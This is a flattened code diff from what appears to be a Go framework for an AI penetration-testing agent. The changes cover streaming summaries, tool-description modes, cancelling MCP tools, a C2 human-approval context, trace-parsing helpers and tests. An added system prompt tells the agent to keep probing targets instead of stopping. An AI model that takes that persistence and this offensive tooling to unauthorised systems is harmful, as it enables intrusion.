sendProgress("response_delta", delta, map[string]interface{}{ var deltaOut string
summaryWire, deltaOut = openai.NormalizeStreamingDelta(summaryWire, delta)
if deltaOut == "" {
return nil
}
sendProgress("response_delta", deltaOut, openai.WithSSEAccumulated(map[string]interface{}{
"conversationId": conversationID, "conversationId": conversationID,
}) }, summaryWire))
return nil return nil
}) })
if strings.TrimSpace(streamText) != "" { if strings.TrimSpace(streamText) != "" {
result.Response = streamText result.Response = streamText
result.LastReActOutput = result.Response result.LastAgentTraceOutput = result.Response
sendProgress("progress", "总结生成完成", nil) sendProgress("progress", "总结生成完成", nil)
return result, nil return result, nil
} }
@@ -855,22 +886,28 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
"mcpExecutionIds": result.MCPExecutionIDs, "mcpExecutionIds": result.MCPExecutionIDs,
"messageGeneratedBy": "summary", "messageGeneratedBy": "summary",
}) })
var summaryWire string
streamText, _ := a.callOpenAIStreamText(ctx, messages, []Tool{}, func(delta string) error { streamText, _ := a.callOpenAIStreamText(ctx, messages, []Tool{}, func(delta string) error {
sendProgress("response_delta", delta, map[string]interface{}{ var deltaOut string
summaryWire, deltaOut = openai.NormalizeStreamingDelta(summaryWire, delta)
if deltaOut == "" {
return nil
}
sendProgress("response_delta", deltaOut, openai.WithSSEAccumulated(map[string]interface{}{
"conversationId": conversationID, "conversationId": conversationID,
}) }, summaryWire))
return nil return nil
}) })
if strings.TrimSpace(streamText) != "" { if strings.TrimSpace(streamText) != "" {
result.Response = streamText result.Response = streamText
result.LastReActOutput = result.Response result.LastAgentTraceOutput = result.Response
sendProgress("progress", "总结生成完成", nil) sendProgress("progress", "总结生成完成", nil)
return result, nil return result, nil
} }
// 如果获取总结失败,使用当前回复作为结果 // 如果获取总结失败,使用当前回复作为结果
if choice.Message.Content != "" { if choice.Message.Content != "" {
result.Response = choice.Message.Content result.Response = choice.Message.Content
result.LastReActOutput = result.Response result.LastAgentTraceOutput = result.Response
return result, nil return result, nil
} }
// 如果都没有内容,跳出循环,让后续逻辑处理 // 如果都没有内容,跳出循环,让后续逻辑处理
@@ -881,7 +918,7 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
if choice.FinishReason == "stop" { if choice.FinishReason == "stop" {
sendProgress("progress", "正在生成最终回复...", nil) sendProgress("progress", "正在生成最终回复...", nil)
result.Response = choice.Message.Content result.Response = choice.Message.Content
result.LastReActOutput = result.Response result.LastAgentTraceOutput = result.Response
return result, nil return result, nil
} }
} }
@@ -902,27 +939,33 @@ func (a *Agent) AgentLoopWithProgress(ctx context.Context, userInput string, his
"mcpExecutionIds": result.MCPExecutionIDs, "mcpExecutionIds": result.MCPExecutionIDs,
"messageGeneratedBy": "max_iter_summary", "messageGeneratedBy": "max_iter_summary",
}) })
var summaryWire string
streamText, _ := a.callOpenAIStreamText(ctx, messages, []Tool{}, func(delta string) error { streamText, _ := a.callOpenAIStreamText(ctx, messages, []Tool{}, func(delta string) error {
sendProgress("response_delta", delta, map[string]interface{}{ var deltaOut string
summaryWire, deltaOut = openai.NormalizeStreamingDelta(summaryWire, delta)
if deltaOut == "" {
return nil
}
sendProgress("response_delta", deltaOut, openai.WithSSEAccumulated(map[string]interface{}{
"conversationId": conversationID, "conversationId": conversationID,
}) }, summaryWire))
return nil return nil
}) })
if strings.TrimSpace(streamText) != "" { if strings.TrimSpace(streamText) != "" {
result.Response = streamText result.Response = streamText
result.LastReActOutput = result.Response result.LastAgentTraceOutput = result.Response
sendProgress("progress", "总结生成完成", nil) sendProgress("progress", "总结生成完成", nil)
return result, nil return result, nil
} }
// 如果无法生成总结,返回友好的提示 // 如果无法生成总结,返回友好的提示
result.Response = fmt.Sprintf("已达到最大迭代次数(%d轮)。系统已执行了多轮测试,但由于达到迭代上限,无法继续自动执行。建议您查看已执行的工具结果,或提出新的测试请求以继续测试。", a.maxIterations) result.Response = fmt.Sprintf("已达到最大迭代次数(%d轮)。系统已执行了多轮测试,但由于达到迭代上限,无法继续自动执行。建议您查看已执行的工具结果,或提出新的测试请求以继续测试。", a.maxIterations)
result.LastReActOutput = result.Response result.LastAgentTraceOutput = result.Response
return result, nil return result, nil
} }
// getAvailableTools 获取可用工具 // getAvailableTools 获取可用工具
// 从MCP服务器动态获取工具列表,使用简短描述以减少token消耗 // 从MCP服务器动态获取工具列表,描述模式由 tool_description_mode 控制
// roleTools: 角色配置的工具列表(toolKey格式),如果为空或nil,则使用所有工具(默认角色) // roleTools: 角色配置的工具列表(toolKey格式),如果为空或nil,则使用所有工具(默认角色)
func (a *Agent) getAvailableTools(roleTools []string) []Tool { func (a *Agent) getAvailableTools(roleTools []string) []Tool {
// 构建角色工具集合(用于快速查找) // 构建角色工具集合(用于快速查找)
@@ -946,11 +989,7 @@ func (a *Agent) getAvailableTools(roleTools []string) []Tool {
continue // 不在角色工具列表中,跳过 continue // 不在角色工具列表中,跳过
} }
} }
// 使用简短描述(如果存在),否则使用详细描述 description := a.pickToolDescription(mcpTool.ShortDescription, mcpTool.Description)
description := mcpTool.ShortDescription
if description == "" {
description = mcpTool.Description
}
// 转换schema中的类型为OpenAI标准类型 // 转换schema中的类型为OpenAI标准类型
convertedSchema := a.convertSchemaTypes(mcpTool.InputSchema) convertedSchema := a.convertSchemaTypes(mcpTool.InputSchema)
@@ -1024,11 +1063,7 @@ func (a *Agent) getAvailableTools(roleTools []string) []Tool {
continue continue
} }
// 使用简短描述(如果存在),否则使用详细描述 description := a.pickToolDescription(externalTool.ShortDescription, externalTool.Description)
description := externalTool.ShortDescription
if description == "" {
description = externalTool.Description
}
// 转换schema中的类型为OpenAI标准类型 // 转换schema中的类型为OpenAI标准类型
convertedSchema := a.convertSchemaTypes(externalTool.InputSchema) convertedSchema := a.convertSchemaTypes(externalTool.InputSchema)
@@ -1063,6 +1098,19 @@ func (a *Agent) getAvailableTools(roleTools []string) []Tool {
return tools return tools
} }
func (a *Agent) pickToolDescription(shortDesc, fullDesc string) string {
a.mu.RLock()
mode := strings.TrimSpace(strings.ToLower(a.toolDescriptionMode))
a.mu.RUnlock()
if mode == "full" {
return fullDesc
}
if shortDesc != "" {
return shortDesc
}
return fullDesc
}
// convertSchemaTypes 递归转换schema中的类型为OpenAI标准类型 // convertSchemaTypes 递归转换schema中的类型为OpenAI标准类型
func (a *Agent) convertSchemaTypes(schema map[string]interface{}) map[string]interface{} { func (a *Agent) convertSchemaTypes(schema map[string]interface{}) map[string]interface{} {
if schema == nil { if schema == nil {
@@ -1478,6 +1526,8 @@ func (a *Agent) executeToolViaMCP(ctx context.Context, toolName string, args map
} }
}() }()
} }
// C2 危险任务 HITL 异步等待:须绑定整条 Agent 运行期 ctx,而非单次工具子 ctxreturn 时会被 cancel
toolCtx = c2.WithHITLRunContext(toolCtx, ctx)
// 检查是否是外部MCP工具(通过工具名称映射) // 检查是否是外部MCP工具(通过工具名称映射)
a.mu.RLock() a.mu.RLock()
@@ -1499,7 +1549,9 @@ func (a *Agent) executeToolViaMCP(ctx context.Context, toolName string, args map
// 如果调用失败(如工具不存在、超时),返回友好的错误信息而不是抛出异常 // 如果调用失败(如工具不存在、超时),返回友好的错误信息而不是抛出异常
if err != nil { if err != nil {
detail := err.Error() detail := err.Error()
if errors.Is(err, context.DeadlineExceeded) { if errors.Is(err, context.Canceled) {
detail = "工具调用已被手动终止(MCP 监控页)。智能体将携带此结果继续后续步骤,整条任务不会因此被停止。"
} else if errors.Is(err, context.DeadlineExceeded) {
min := 10 min := 10
if a.agentConfig != nil && a.agentConfig.ToolTimeoutMinutes > 0 { if a.agentConfig != nil && a.agentConfig.ToolTimeoutMinutes > 0 {
min = a.agentConfig.ToolTimeoutMinutes min = a.agentConfig.ToolTimeoutMinutes
@@ -1665,6 +1717,18 @@ func (a *Agent) UpdateMaxIterations(maxIterations int) {
} }
} }
// UpdateToolDescriptionMode 更新工具描述模式(short/full)
func (a *Agent) UpdateToolDescriptionMode(mode string) {
a.mu.Lock()
defer a.mu.Unlock()
mode = strings.TrimSpace(strings.ToLower(mode))
if mode != "full" {
mode = "short"
}
a.toolDescriptionMode = mode
a.logger.Info("Agent工具描述模式已更新", zap.String("tool_description_mode", mode))
}
// formatToolError 格式化工具错误信息,提供更友好的错误描述 // formatToolError 格式化工具错误信息,提供更友好的错误描述
func (a *Agent) formatToolError(toolName string, args map[string]interface{}, err error) string { func (a *Agent) formatToolError(toolName string, args map[string]interface{}, err error) string {
errorMsg := fmt.Sprintf(`工具执行失败 errorMsg := fmt.Sprintf(`工具执行失败
@@ -1876,9 +1940,35 @@ func (a *Agent) ExecuteMCPToolForConversation(ctx context.Context, conversationI
a.currentConversationID = prev a.currentConversationID = prev
a.mu.Unlock() a.mu.Unlock()
}() }()
ctx = withAgentConversationID(ctx, conversationID)
return a.executeToolViaMCP(ctx, toolName, args) return a.executeToolViaMCP(ctx, toolName, args)
} }
// RecordLocalToolExecution 将非 CallTool 路径完成的工具调用写入 MCP 监控库(与 CallTool 落库一致),返回 executionId。
// 用于 Eino filesystem execute 等场景,使助手气泡「渗透测试详情」与常规 MCP 一致可点进监控。
func (a *Agent) RecordLocalToolExecution(toolName string, args map[string]interface{}, resultText string, invokeErr error) string {
if a == nil || a.mcpServer == nil {
return ""
}
return a.mcpServer.RecordCompletedToolInvocation(toolName, args, resultText, invokeErr)
}
// CancelMCPToolExecutionWithNote 取消一次进行中的 MCP 工具(先内部后外部),与监控页「终止工具」一致;note 非空时合并进返回给模型的文本。
func (a *Agent) CancelMCPToolExecutionWithNote(executionID, note string) bool {
executionID = strings.TrimSpace(executionID)
note = strings.TrimSpace(note)
if executionID == "" {
return false
}
if a.mcpServer != nil && a.mcpServer.CancelToolExecutionWithNote(executionID, note) {
return true
}
if a.externalMCPMgr != nil && a.externalMCPMgr.CancelToolExecutionWithNote(executionID, note) {
return true
}
return false
}
// extractQuotedToolName 尝试从错误信息中提取被引用的工具名称 // extractQuotedToolName 尝试从错误信息中提取被引用的工具名称
func extractQuotedToolName(errMsg string) string { func extractQuotedToolName(errMsg string) string {
start := strings.Index(errMsg, "\"") start := strings.Index(errMsg, "\"")
+48 -49
View File
@@ -18,62 +18,62 @@ import (
func setupTestAgent(t *testing.T) (*Agent, *storage.FileResultStorage) { func setupTestAgent(t *testing.T) (*Agent, *storage.FileResultStorage) {
logger := zap.NewNop() logger := zap.NewNop()
mcpServer := mcp.NewServer(logger) mcpServer := mcp.NewServer(logger)
openAICfg := &config.OpenAIConfig{ openAICfg := &config.OpenAIConfig{
APIKey: "test-key", APIKey: "test-key",
BaseURL: "https://api.test.com/v1", BaseURL: "https://api.test.com/v1",
Model: "test-model", Model: "test-model",
} }
agentCfg := &config.AgentConfig{ agentCfg := &config.AgentConfig{
MaxIterations: 10, MaxIterations: 10,
LargeResultThreshold: 100, // 设置较小的阈值便于测试 LargeResultThreshold: 100, // 设置较小的阈值便于测试
ResultStorageDir: "", ResultStorageDir: "",
} }
agent := NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 10) agent := NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 10)
// 创建测试存储 // 创建测试存储
tmpDir := filepath.Join(os.TempDir(), "test_agent_storage_"+time.Now().Format("20060102_150405")) tmpDir := filepath.Join(os.TempDir(), "test_agent_storage_"+time.Now().Format("20060102_150405"))
testStorage, err := storage.NewFileResultStorage(tmpDir, logger) testStorage, err := storage.NewFileResultStorage(tmpDir, logger)
if err != nil { if err != nil {
t.Fatalf("创建测试存储失败: %v", err) t.Fatalf("创建测试存储失败: %v", err)
} }
agent.SetResultStorage(testStorage) agent.SetResultStorage(testStorage)
return agent, testStorage return agent, testStorage
} }
func TestAgent_FormatMinimalNotification(t *testing.T) { func TestAgent_FormatMinimalNotification(t *testing.T) {
agent, testStorage := setupTestAgent(t) agent, testStorage := setupTestAgent(t)
_ = testStorage // 避免未使用变量警告 _ = testStorage // 避免未使用变量警告
executionID := "test_exec_001" executionID := "test_exec_001"
toolName := "nmap_scan" toolName := "nmap_scan"
size := 50000 size := 50000
lineCount := 1000 lineCount := 1000
filePath := "tmp/test_exec_001.txt" filePath := "tmp/test_exec_001.txt"
notification := agent.formatMinimalNotification(executionID, toolName, size, lineCount, filePath) notification := agent.formatMinimalNotification(executionID, toolName, size, lineCount, filePath)
// 验证通知包含必要信息 // 验证通知包含必要信息
if !strings.Contains(notification, executionID) { if !strings.Contains(notification, executionID) {
t.Errorf("通知中应该包含执行ID: %s", executionID) t.Errorf("通知中应该包含执行ID: %s", executionID)
} }
if !strings.Contains(notification, toolName) { if !strings.Contains(notification, toolName) {
t.Errorf("通知中应该包含工具名称: %s", toolName) t.Errorf("通知中应该包含工具名称: %s", toolName)
} }
if !strings.Contains(notification, "50000") { if !strings.Contains(notification, "50000") {
t.Errorf("通知中应该包含大小信息") t.Errorf("通知中应该包含大小信息")
} }
if !strings.Contains(notification, "1000") { if !strings.Contains(notification, "1000") {
t.Errorf("通知中应该包含行数信息") t.Errorf("通知中应该包含行数信息")
} }
if !strings.Contains(notification, "query_execution_result") { if !strings.Contains(notification, "query_execution_result") {
t.Errorf("通知中应该包含查询工具的使用说明") t.Errorf("通知中应该包含查询工具的使用说明")
} }
@@ -81,7 +81,7 @@ func TestAgent_FormatMinimalNotification(t *testing.T) {
func TestAgent_ExecuteToolViaMCP_LargeResult(t *testing.T) { func TestAgent_ExecuteToolViaMCP_LargeResult(t *testing.T) {
agent, _ := setupTestAgent(t) agent, _ := setupTestAgent(t)
// 创建模拟的MCP工具结果(大结果) // 创建模拟的MCP工具结果(大结果)
largeResult := &mcp.ToolResult{ largeResult := &mcp.ToolResult{
Content: []mcp.Content{ Content: []mcp.Content{
@@ -92,59 +92,59 @@ func TestAgent_ExecuteToolViaMCP_LargeResult(t *testing.T) {
}, },
IsError: false, IsError: false,
} }
// 模拟MCP服务器返回大结果 // 模拟MCP服务器返回大结果
// 由于我们需要模拟CallTool的行为,这里需要创建一个mock或者使用实际的MCP服务器 // 由于我们需要模拟CallTool的行为,这里需要创建一个mock或者使用实际的MCP服务器
// 为了简化测试,我们直接测试结果处理逻辑 // 为了简化测试,我们直接测试结果处理逻辑
// 设置阈值 // 设置阈值
agent.mu.Lock() agent.mu.Lock()
agent.largeResultThreshold = 1000 // 设置较小的阈值 agent.largeResultThreshold = 1000 // 设置较小的阈值
agent.mu.Unlock() agent.mu.Unlock()
// 创建执行ID // 创建执行ID
executionID := "test_exec_large_001" executionID := "test_exec_large_001"
toolName := "test_tool" toolName := "test_tool"
// 格式化结果 // 格式化结果
var resultText strings.Builder var resultText strings.Builder
for _, content := range largeResult.Content { for _, content := range largeResult.Content {
resultText.WriteString(content.Text) resultText.WriteString(content.Text)
resultText.WriteString("\n") resultText.WriteString("\n")
} }
resultStr := resultText.String() resultStr := resultText.String()
resultSize := len(resultStr) resultSize := len(resultStr)
// 检测大结果并保存 // 检测大结果并保存
agent.mu.RLock() agent.mu.RLock()
threshold := agent.largeResultThreshold threshold := agent.largeResultThreshold
storage := agent.resultStorage storage := agent.resultStorage
agent.mu.RUnlock() agent.mu.RUnlock()
if resultSize > threshold && storage != nil { if resultSize > threshold && storage != nil {
// 保存大结果 // 保存大结果
err := storage.SaveResult(executionID, toolName, resultStr) err := storage.SaveResult(executionID, toolName, resultStr)
if err != nil { if err != nil {
t.Fatalf("保存大结果失败: %v", err) t.Fatalf("保存大结果失败: %v", err)
} }
// 生成通知 // 生成通知
lines := strings.Split(resultStr, "\n") lines := strings.Split(resultStr, "\n")
filePath := storage.GetResultPath(executionID) filePath := storage.GetResultPath(executionID)
notification := agent.formatMinimalNotification(executionID, toolName, resultSize, len(lines), filePath) notification := agent.formatMinimalNotification(executionID, toolName, resultSize, len(lines), filePath)
// 验证通知格式 // 验证通知格式
if !strings.Contains(notification, executionID) { if !strings.Contains(notification, executionID) {
t.Errorf("通知中应该包含执行ID") t.Errorf("通知中应该包含执行ID")
} }
// 验证结果已保存 // 验证结果已保存
savedResult, err := storage.GetResult(executionID) savedResult, err := storage.GetResult(executionID)
if err != nil { if err != nil {
t.Fatalf("获取保存的结果失败: %v", err) t.Fatalf("获取保存的结果失败: %v", err)
} }
if savedResult != resultStr { if savedResult != resultStr {
t.Errorf("保存的结果与原始结果不匹配") t.Errorf("保存的结果与原始结果不匹配")
} }
@@ -155,7 +155,7 @@ func TestAgent_ExecuteToolViaMCP_LargeResult(t *testing.T) {
func TestAgent_ExecuteToolViaMCP_SmallResult(t *testing.T) { func TestAgent_ExecuteToolViaMCP_SmallResult(t *testing.T) {
agent, _ := setupTestAgent(t) agent, _ := setupTestAgent(t)
// 创建小结果 // 创建小结果
smallResult := &mcp.ToolResult{ smallResult := &mcp.ToolResult{
Content: []mcp.Content{ Content: []mcp.Content{
@@ -166,32 +166,32 @@ func TestAgent_ExecuteToolViaMCP_SmallResult(t *testing.T) {
}, },
IsError: false, IsError: false,
} }
// 设置较大的阈值 // 设置较大的阈值
agent.mu.Lock() agent.mu.Lock()
agent.largeResultThreshold = 100000 // 100KB agent.largeResultThreshold = 100000 // 100KB
agent.mu.Unlock() agent.mu.Unlock()
// 格式化结果 // 格式化结果
var resultText strings.Builder var resultText strings.Builder
for _, content := range smallResult.Content { for _, content := range smallResult.Content {
resultText.WriteString(content.Text) resultText.WriteString(content.Text)
resultText.WriteString("\n") resultText.WriteString("\n")
} }
resultStr := resultText.String() resultStr := resultText.String()
resultSize := len(resultStr) resultSize := len(resultStr)
// 检测大结果 // 检测大结果
agent.mu.RLock() agent.mu.RLock()
threshold := agent.largeResultThreshold threshold := agent.largeResultThreshold
storage := agent.resultStorage storage := agent.resultStorage
agent.mu.RUnlock() agent.mu.RUnlock()
if resultSize > threshold && storage != nil { if resultSize > threshold && storage != nil {
t.Fatal("小结果不应该被保存") t.Fatal("小结果不应该被保存")
} }
// 小结果应该直接返回 // 小结果应该直接返回
if resultSize <= threshold { if resultSize <= threshold {
// 这是预期的行为 // 这是预期的行为
@@ -203,26 +203,26 @@ func TestAgent_ExecuteToolViaMCP_SmallResult(t *testing.T) {
func TestAgent_SetResultStorage(t *testing.T) { func TestAgent_SetResultStorage(t *testing.T) {
agent, _ := setupTestAgent(t) agent, _ := setupTestAgent(t)
// 创建新的存储 // 创建新的存储
tmpDir := filepath.Join(os.TempDir(), "test_new_storage_"+time.Now().Format("20060102_150405")) tmpDir := filepath.Join(os.TempDir(), "test_new_storage_"+time.Now().Format("20060102_150405"))
newStorage, err := storage.NewFileResultStorage(tmpDir, zap.NewNop()) newStorage, err := storage.NewFileResultStorage(tmpDir, zap.NewNop())
if err != nil { if err != nil {
t.Fatalf("创建新存储失败: %v", err) t.Fatalf("创建新存储失败: %v", err)
} }
// 设置新存储 // 设置新存储
agent.SetResultStorage(newStorage) agent.SetResultStorage(newStorage)
// 验证存储已更新 // 验证存储已更新
agent.mu.RLock() agent.mu.RLock()
currentStorage := agent.resultStorage currentStorage := agent.resultStorage
agent.mu.RUnlock() agent.mu.RUnlock()
if currentStorage != newStorage { if currentStorage != newStorage {
t.Fatal("存储未正确更新") t.Fatal("存储未正确更新")
} }
// 清理 // 清理
os.RemoveAll(tmpDir) os.RemoveAll(tmpDir)
} }
@@ -230,24 +230,24 @@ func TestAgent_SetResultStorage(t *testing.T) {
func TestAgent_NewAgent_DefaultValues(t *testing.T) { func TestAgent_NewAgent_DefaultValues(t *testing.T) {
logger := zap.NewNop() logger := zap.NewNop()
mcpServer := mcp.NewServer(logger) mcpServer := mcp.NewServer(logger)
openAICfg := &config.OpenAIConfig{ openAICfg := &config.OpenAIConfig{
APIKey: "test-key", APIKey: "test-key",
BaseURL: "https://api.test.com/v1", BaseURL: "https://api.test.com/v1",
Model: "test-model", Model: "test-model",
} }
// 测试默认配置 // 测试默认配置
agent := NewAgent(openAICfg, nil, mcpServer, nil, logger, 0) agent := NewAgent(openAICfg, nil, mcpServer, nil, logger, 0)
if agent.maxIterations != 30 { if agent.maxIterations != 30 {
t.Errorf("默认迭代次数不匹配。期望: 30, 实际: %d", agent.maxIterations) t.Errorf("默认迭代次数不匹配。期望: 30, 实际: %d", agent.maxIterations)
} }
agent.mu.RLock() agent.mu.RLock()
threshold := agent.largeResultThreshold threshold := agent.largeResultThreshold
agent.mu.RUnlock() agent.mu.RUnlock()
if threshold != 50*1024 { if threshold != 50*1024 {
t.Errorf("默认阈值不匹配。期望: %d, 实际: %d", 50*1024, threshold) t.Errorf("默认阈值不匹配。期望: %d, 实际: %d", 50*1024, threshold)
} }
@@ -256,31 +256,30 @@ func TestAgent_NewAgent_DefaultValues(t *testing.T) {
func TestAgent_NewAgent_CustomConfig(t *testing.T) { func TestAgent_NewAgent_CustomConfig(t *testing.T) {
logger := zap.NewNop() logger := zap.NewNop()
mcpServer := mcp.NewServer(logger) mcpServer := mcp.NewServer(logger)
openAICfg := &config.OpenAIConfig{ openAICfg := &config.OpenAIConfig{
APIKey: "test-key", APIKey: "test-key",
BaseURL: "https://api.test.com/v1", BaseURL: "https://api.test.com/v1",
Model: "test-model", Model: "test-model",
} }
agentCfg := &config.AgentConfig{ agentCfg := &config.AgentConfig{
MaxIterations: 20, MaxIterations: 20,
LargeResultThreshold: 100 * 1024, // 100KB LargeResultThreshold: 100 * 1024, // 100KB
ResultStorageDir: "custom_tmp", ResultStorageDir: "custom_tmp",
} }
agent := NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 15) agent := NewAgent(openAICfg, agentCfg, mcpServer, nil, logger, 15)
if agent.maxIterations != 15 { if agent.maxIterations != 15 {
t.Errorf("迭代次数不匹配。期望: 15, 实际: %d", agent.maxIterations) t.Errorf("迭代次数不匹配。期望: 15, 实际: %d", agent.maxIterations)
} }
agent.mu.RLock() agent.mu.RLock()
threshold := agent.largeResultThreshold threshold := agent.largeResultThreshold
agent.mu.RUnlock() agent.mu.RUnlock()
if threshold != 100*1024 { if threshold != 100*1024 {
t.Errorf("阈值不匹配。期望: %d, 实际: %d", 100*1024, threshold) t.Errorf("阈值不匹配。期望: %d, 实际: %d", 100*1024, threshold)
} }
} }
+167
View File
@@ -0,0 +1,167 @@
package agent
import (
"encoding/json"
"strings"
)
// ParseTraceMessages 解析落库的 last_react_inputOpenAI 风格 messages JSON 数组)。
func ParseTraceMessages(traceInputJSON string) ([]ChatMessage, error) {
traceInputJSON = strings.TrimSpace(traceInputJSON)
if traceInputJSON == "" {
return nil, nil
}
var raw []map[string]interface{}
if err := json.Unmarshal([]byte(traceInputJSON), &raw); err != nil {
return nil, err
}
out := make([]ChatMessage, 0, len(raw))
for _, msgMap := range raw {
msg := ChatMessage{}
role, _ := msgMap["role"].(string)
if role == "" {
continue
}
msg.Role = role
if content, ok := msgMap["content"].(string); ok {
msg.Content = content
}
if rc, ok := msgMap["reasoning_content"].(string); ok && strings.TrimSpace(rc) != "" {
msg.ReasoningContent = rc
}
if toolCallsRaw, ok := msgMap["tool_calls"]; ok && toolCallsRaw != nil {
if toolCallsArray, ok := toolCallsRaw.([]interface{}); ok {
for _, tcRaw := range toolCallsArray {
tcMap, ok := tcRaw.(map[string]interface{})
if !ok {
continue
}
toolCall := ToolCall{}
if id, ok := tcMap["id"].(string); ok {
toolCall.ID = id
}
if toolType, ok := tcMap["type"].(string); ok {
toolCall.Type = toolType
}
if funcMap, ok := tcMap["function"].(map[string]interface{}); ok {
toolCall.Function = FunctionCall{}
if name, ok := funcMap["name"].(string); ok {
toolCall.Function.Name = name
}
if argsRaw, ok := funcMap["arguments"]; ok {
if argsStr, ok := argsRaw.(string); ok {
var argsMap map[string]interface{}
if err := json.Unmarshal([]byte(argsStr), &argsMap); err == nil {
toolCall.Function.Arguments = argsMap
}
} else if argsMap, ok := argsRaw.(map[string]interface{}); ok {
toolCall.Function.Arguments = argsMap
}
}
}
if toolCall.ID != "" {
msg.ToolCalls = append(msg.ToolCalls, toolCall)
}
}
}
}
if toolCallID, ok := msgMap["tool_call_id"].(string); ok {
msg.ToolCallID = toolCallID
}
if tn, ok := msgMap["tool_name"].(string); ok && strings.TrimSpace(tn) != "" {
msg.ToolName = strings.TrimSpace(tn)
} else if tn, ok := msgMap["name"].(string); ok && strings.TrimSpace(tn) != "" && strings.EqualFold(msg.Role, "tool") {
msg.ToolName = strings.TrimSpace(tn)
}
out = append(out, msg)
}
return out, nil
}
// ExtractLastUserTurnMessages 仅保留最后一次 user 提问起的消息(不含更早的用户轮次;跳过 system)。
// 与「继续对话」续跑所用轨迹范围一致:当前任务轮次,而非整段多轮对话历史。
func ExtractLastUserTurnMessages(msgs []ChatMessage) []ChatMessage {
if len(msgs) == 0 {
return msgs
}
lastUser := -1
for i, m := range msgs {
if strings.EqualFold(m.Role, "user") {
lastUser = i
}
}
if lastUser < 0 {
return msgs
}
trimmed := msgs[lastUser:]
out := make([]ChatMessage, 0, len(trimmed))
for _, m := range trimmed {
if strings.EqualFold(m.Role, "system") {
continue
}
out = append(out, m)
}
return out
}
// ExtractLastUserTurnTraceJSON 在 JSON 轨迹上裁剪为最后一次 user 起的片段(供落库格式直接处理)。
func ExtractLastUserTurnTraceJSON(traceInputJSON string) string {
traceInputJSON = strings.TrimSpace(traceInputJSON)
if traceInputJSON == "" {
return traceInputJSON
}
var arr []map[string]interface{}
if err := json.Unmarshal([]byte(traceInputJSON), &arr); err != nil {
return traceInputJSON
}
lastUser := -1
for i, m := range arr {
if r, _ := m["role"].(string); strings.EqualFold(r, "user") {
lastUser = i
}
}
if lastUser <= 0 {
return traceInputJSON
}
trimmed := arr[lastUser:]
b, err := json.Marshal(trimmed)
if err != nil {
return traceInputJSON
}
return string(b)
}
// MergeAssistantTraceOutput 将 last_react_output 合并进轨迹最后一条 assistant(与 loadHistoryFromAgentTrace 一致)。
func MergeAssistantTraceOutput(msgs []ChatMessage, assistantOut string) []ChatMessage {
assistantOut = strings.TrimSpace(assistantOut)
if assistantOut == "" || len(msgs) == 0 {
return msgs
}
out := append([]ChatMessage(nil), msgs...)
last := &out[len(out)-1]
if strings.EqualFold(last.Role, "assistant") && len(last.ToolCalls) == 0 {
last.Content = assistantOut
return out
}
out = append(out, ChatMessage{
Role: "assistant",
Content: assistantOut,
})
return out
}
// MessagesToTraceJSON 将消息带序列化为 JSON(跳过 system)。
func MessagesToTraceJSON(msgs []ChatMessage) (string, error) {
filtered := make([]ChatMessage, 0, len(msgs))
for _, m := range msgs {
if strings.EqualFold(m.Role, "system") {
continue
}
filtered = append(filtered, m)
}
b, err := json.Marshal(filtered)
if err != nil {
return "", err
}
return string(b), nil
}
+57
View File
@@ -0,0 +1,57 @@
package agent
import (
"encoding/json"
"testing"
)
func TestExtractLastUserTurnTraceJSON(t *testing.T) {
raw := []map[string]interface{}{
{"role": "user", "content": "old question"},
{"role": "assistant", "content": "old answer"},
{"role": "user", "content": "new target 1.1.1.1"},
{"role": "assistant", "tool_calls": []interface{}{map[string]interface{}{
"id": "c1", "type": "function",
"function": map[string]interface{}{"name": "nmap", "arguments": "{}"},
}}},
{"role": "tool", "tool_call_id": "c1", "content": "open ports"},
}
b, _ := json.Marshal(raw)
out := ExtractLastUserTurnTraceJSON(string(b))
var trimmed []map[string]interface{}
if err := json.Unmarshal([]byte(out), &trimmed); err != nil {
t.Fatal(err)
}
if len(trimmed) != 3 {
t.Fatalf("expected 3 messages, got %d", len(trimmed))
}
if trimmed[0]["content"] != "new target 1.1.1.1" {
t.Fatalf("unexpected first message: %v", trimmed[0])
}
}
func TestExtractLastUserTurnMessagesSkipsSystem(t *testing.T) {
msgs := []ChatMessage{
{Role: "system", Content: "sys"},
{Role: "user", Content: "q"},
{Role: "assistant", Content: "a"},
}
out := ExtractLastUserTurnMessages(msgs)
if len(out) != 2 {
t.Fatalf("expected 2, got %d", len(out))
}
if out[0].Role != "user" {
t.Fatal("expected user first")
}
}
func TestMergeAssistantTraceOutput(t *testing.T) {
msgs := []ChatMessage{
{Role: "user", Content: "q"},
{Role: "assistant", Content: "draft"},
}
out := MergeAssistantTraceOutput(msgs, "final summary")
if out[len(out)-1].Content != "final summary" {
t.Fatalf("expected merged output, got %q", out[len(out)-1].Content)
}
}
@@ -91,6 +91,20 @@ func DefaultSingleAgentSystemPrompt() string {
当工具返回错误时,错误信息会包含在工具响应中,请仔细阅读并做出合理的决策。 当工具返回错误时,错误信息会包含在工具响应中,请仔细阅读并做出合理的决策。
## 结束条件与停止约束
- 在「未完成用户目标」前,不得输出纯计划/纯建议式结论并结束本轮;必须继续给出可执行下一步,并优先通过工具验证。
- 若你准备结束回答,先执行一次自检:
1) 是否已有可验证证据支撑“任务完成/无法继续”的结论;
2) 是否至少尝试过当前路径的合理替代(参数、路径、方法、入口);
3) 是否仍存在可执行且低成本的下一步验证动作。
- 仅当满足以下任一条件时,才允许输出最终收尾:
1) 已达到用户目标并给出证据;
2) 达到明确边界(超时、权限、目标不可达、工具不可用且无替代),并清楚说明阻断点与已尝试项;
3) 用户明确要求停止。
- 若最近一步得到 404/空结果/无效响应,不得直接结束;至少再进行一次“同目标不同策略”的验证(如变更路径、参数、请求方法、上下文来源)。
- 避免无效空转:同一工具+同类参数连续失败 3 次后,必须切换策略(改工具、改入口、改假设)并说明切换原因。
## 漏洞记录 ## 漏洞记录
发现有效漏洞时,必须使用 ` + builtin.ToolRecordVulnerability + ` 记录:标题、描述、严重程度、类型、目标、证明(POC)、影响、修复建议。 发现有效漏洞时,必须使用 ` + builtin.ToolRecordVulnerability + ` 记录:标题、描述、严重程度、类型、目标、证明(POC)、影响、修复建议。
+5 -5
View File
@@ -256,11 +256,11 @@ func orchestratorConfigFromOrchestrator(o *OrchestratorMarkdown) config.MultiAge
return config.MultiAgentSubConfig{} return config.MultiAgentSubConfig{}
} }
return config.MultiAgentSubConfig{ return config.MultiAgentSubConfig{
